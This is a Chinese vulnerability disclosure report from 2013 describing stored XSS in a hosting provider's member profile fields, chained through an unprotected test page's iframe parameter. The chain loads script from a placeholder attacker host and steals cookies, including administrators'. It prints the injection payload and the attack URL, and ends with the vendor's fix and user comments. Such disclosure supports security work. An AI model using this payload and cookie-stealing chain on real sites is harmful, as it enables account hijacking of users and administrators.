漏洞概要
关注数(24)
关注此漏洞
漏洞标题:主机屋XSS回旋镖--自插点的利用
提交时间:2013-11-08 15:03
修复时间:2013-12-23 15:04
公开时间:2013-12-23 15:04
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2013-11-08: 细节已通知厂商并且等待厂商处理中
2013-11-12: 厂商已经确认,细节仅向厂商公开
2013-11-22: 细节向核心白帽子及相关领域专家公开
2013-12-02: 细节向普通白帽子公开
2013-12-12: 细节向实习白帽子公开
2013-12-23: 细节向公众公开
简要描述:
主机屋自插点的利用,这样子的利用可以过了吧。
详细说明:
主机屋会员中心个人信息
详细地址
联系人
QQ处都存在存储型XSS
插入语句
"><img src=1 onerror=alert(/xss/)><input type=:hidden
本来是一个自插的点,查找并没有发现越权修改个人信息的地方(@小川),本来以为就是个鸡肋。
找着找着,发现这么个地址
http://www.zhujiwu.com/test/test.asp
貌似是检查白名单的地方,真不知道这个URL到底干嘛用的。
插入的url参数直接带入了iframe框架src
简直是白送的XSS,这样就可以从这跳跃到自插的位置了。
于是我们构造javascript
能够获取当前详细地址,再插入自己的代码,当成伪装了。
主机屋并没有HTTPonly
演示最后的过程
发送我们访问的地址:
http://www.zhujiwu.com/test/test.asp?url=xxxxx.sinaapp.com/xxxx.html
不能暴露sae地址,类似这样的地址。
原始页面:
访问url后:
收到的cookie
漏洞证明:
个人信息能看到的人还是很多的,比如管理员啊!
这样伪装还能永久劫持个人用户!
如上!
修复方案:
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2013-11-12 15:01
厂商回复:
感谢关注主机屋安全,已将此页面删除
最新状态:
暂无
漏洞评价:
评论
-
2013-11-08 16:27 |
乌云最帅的淫 ( 实习白帽子 | Rank:51 漏洞数:23 | 不以淫荡惊天下,就以闷骚动世人)
-
2013-11-08 17:19 |
xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)
@乌云最帅的淫 不单单是那个位置,结合利用的一个方案...
-
2013-11-12 15:21 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2013-11-13 09:52 |
xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)
-
2013-12-10 21:35 |
D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)
-
2013-12-23 15:16 |
0x004er ( 实习白帽子 | Rank:48 漏洞数:19 | 。。。。。。。)
-
2013-12-23 15:50 |
Evi1m0 ( 路人 | Rank:8 漏洞数:2 | 邪红色信息安全组织)